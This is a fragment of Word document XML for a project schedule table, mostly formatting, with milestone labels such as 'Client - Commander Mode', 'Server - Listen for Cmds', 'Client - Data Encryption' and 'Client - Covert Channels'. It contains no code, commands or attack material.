            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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Task Assignments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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D9EAD3" w:fill="D9EAD3"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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D9EAD3" w:fill="D9EAD3"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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D9EAD3" w:fill="D9EAD3"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="C9DAF8" w:fill="C9DAF8"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milestone #2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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Client - Commander Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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single" w:sz="4" w:space="0" w:color="000000"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="1155CC" w:fill="1155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single" w:sz="4" w:space="0" w:color="000000"/>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886"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23"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41"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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="C9DAF8" w:fill="C9DAF8"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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Client - Listening Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="1155CC" w:fill="1155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886"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23"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41"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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="C9DAF8" w:fill="C9DAF8"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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xml:space="preserve">Server - Listen for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cmds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="1155CC" w:fill="1155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886"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23"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41"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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="C9DAF8" w:fill="C9DAF8"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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xml:space="preserve">Server - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rtn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>. Cmd. Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="1155CC" w:fill="1155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886"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23"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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="C9DAF8" w:fill="C9DAF8"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="EAD1DC" w:fill="EAD1DC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milestone #3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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Client - Data Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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single" w:sz="4" w:space="0" w:color="000000"/>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nil"/>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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="A64D79" w:fill="A64D7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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>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single" w:sz="4" w:space="0" w:color="000000"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>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single" w:sz="4" w:space="0" w:color="000000"/>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single" w:sz="4" w:space="0" w:color="000000"/>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single" w:sz="4" w:space="0" w:color="000000"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="EAD1DC" w:fill="EAD1DC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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Client - Covert Channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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nil"/>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nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="A64D79" w:fill="A64D7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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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nil"/>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nil"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="EAD1DC" w:fill="EAD1DC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
